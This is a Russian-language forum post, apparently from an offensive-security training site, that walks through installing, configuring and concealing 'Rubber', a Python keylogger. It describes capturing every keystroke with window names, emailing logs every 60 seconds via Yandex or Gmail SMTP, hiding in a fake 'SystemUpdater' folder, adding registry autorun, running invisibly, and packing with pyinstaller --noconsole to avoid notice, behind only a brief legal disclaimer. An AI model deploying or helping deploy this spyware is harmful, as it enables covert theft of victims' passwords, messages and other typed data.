Rubber — это утилита, созданная для автоматизации задач мониторинга и сбора данных, например, логирования клавиш. В этой статье я расскажу, как установить Rubber, настроить его для работы с почтой, и использовать его функционал.

⚠️ Важно: Программное обеспечение, подобное Rubber, может быть использовано как легально, так и с нарушением закона. Используйте этот код только в образовательных целях или в рамках собственной инфраструктуры, с соблюдением всех правовых норм.
Репо:GitHub - GhostRiles/Rubber: Rubber is a lightweight and stealthy keylogger built using Python. It is designed for educational purposes and ethical penetration testing. The tool silently captures all keystrokes, records the name of the currently active window, and periodically sends the logs to a specified Yandex email address

Установка Rubber​

  1. Клонируем репозиторий:
    Сначала загрузите исходный код Rubber с GitHub.
    1.
    1734262057424.png

    2.
    image 1 (1).png

  2. Установите зависимости:
    Убедитесь, что Python версии 3.8+ установлен в вашей системе. Затем установите зависимости:
    1734261929861.png
  3. Настройка почтового клиента:
    В коде необходимо указать учетные данные вашего почтового аккаунта.
    Вставьте ваши данные в следующие строки:

    ⚠️ Рекомендация: Для работы с Yandex или Gmail используйте пароль приложения, чтобы защитить основной пароль аккаунта.
  4. Запуск программы:
    Теперь программа готова к запуску. Введите:

    python main.py

Основной функционал Rubber​

  1. Логирование клавиш
    Rubber фиксирует каждое нажатие клавиши и сохраняет его с привязкой к активному окну и временной метке. Логи формируются в следующем формате:
    less
    [2024-12-15 10:05:23] (Chrome): a
    [2024-12-15 10:05:24] (Notepad): [ENTER]
  2. Отправка логов на email
    Логи автоматически отправляются на указанный email каждые 60 секунд (по умолчанию). Для этого используется SMTP-сервер, в данном случае Yandex.
  3. Автозагрузка
    Rubber копирует себя в скрытую папку (%AppData%\Local\SystemUpdater)
    1734263522338 1.png
    и добавляет запись в реестр Windows для автозапуска.
    1734263541445.png
  4. Работа в фоне
    Программа полностью невидима для пользователя, так как запускается без окна и подавляет все ошибки.
  5. Вот пример отправки логов на почту:
    загрузка 1.png

Как работает код​

Разберем ключевые участки программы:

  • Логирование клавиш:
    Используется библиотека keyboard, которая перехватывает события клавиш. Для каждой клавиши вызывается функция record_key().
    python
    1734262998755.png
  • Работа с реестром:
    Функция add_to_startup() создает запись в реестре для автозапуска программы.
    python
  • 1734263038499.png

  • Отправка логов:
    Используется библиотека smtplib для подключения к серверу Yandex и отправки данных.
    python
    1734263113769.png

Советы для использования​

  1. Настройка частоты отправки email:
    Если 60 секунд кажутся слишком коротким интервалом, измените параметр в функции schedule_email(). Например, для отправки каждые 5 минут:
    threading.Timer(300, schedule_email).start()
  2. Работа с Gmail:
    Если хотите использовать Gmail вместо Yandex, измените сервер:
    server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
    ⚠️ Для Gmail обязательно включите двухфакторную аутентификацию и создайте пароль приложения.
  3. Скрытие процесса:
    Для дополнительной маскировки можно использовать инструменты сжатия и упаковки Python-скриптов, такие как pyinstaller.
    Пример команды:
    pyinstaller --onefile --noconsole rubber.py
 

Вложения

  • image 1.png
    image 1.png
    1,4 КБ · Просмотры: 9
  • 1734263522338.png
    1734263522338.png
    3 КБ · Просмотры: 20
Последнее редактирование:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!